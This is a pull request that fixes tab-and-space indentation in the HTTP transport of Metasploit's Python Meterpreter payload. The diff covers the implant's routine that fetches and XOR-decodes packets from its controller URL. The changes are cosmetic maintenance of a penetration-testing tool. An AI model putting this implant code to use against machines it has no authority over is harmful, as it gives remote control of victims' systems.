### PR TITLE
Fix meterpreter.py indentation

### DIFF
--- a/python/meterpreter/meterpreter.py
+++ b/python/meterpreter/meterpreter.py
@@ -642,21 +642,21 @@ class HttpTransport(Transport):
 		packet = None
 		xor_key = None
 		request = urllib.Request(self.url, None, self._http_request_headers)
-                try:
-                    url_h = urllib.urlopen(request, timeout=self.communication_timeout)
-                    packet = url_h.read()
-                    for _ in range(1):
-                            if packet == '':
-                                    break
-                            if len(packet) < PACKET_HEADER_SIZE:
-                                    packet = None  # looks corrupt
-                                    break
-                            xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
-                            header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
-                            pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] - 8
-                            if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
-                                    packet = None  # looks corrupt
-                except:
+		try:
+			url_h = urllib.urlopen(request, timeout=self.communication_timeout)
+			packet = url_h.read()
+			for _ in range(1):
+				if packet == '':
+					break
+				if len(packet) < PACKET_HEADER_SIZE:
+					packet = None  # looks corrupt
+					break
+				xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
+				header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
+				pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0] - 8
+				if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
+					packet = None  # looks corrupt
+		except:
 			debug_traceback('Failure to receive packet from ' + self.url)
 
 		if not packet:


### PR DESCRIPTION
Commit b5372d2a98a47509b2ddf0b60a90de5a43f32f23 messed up the indentation
(mixing spaces and tabs) for some parts of the code. This commit fixes it.

Closes https://github.com/rapid7/metasploit-payloads/issues/265.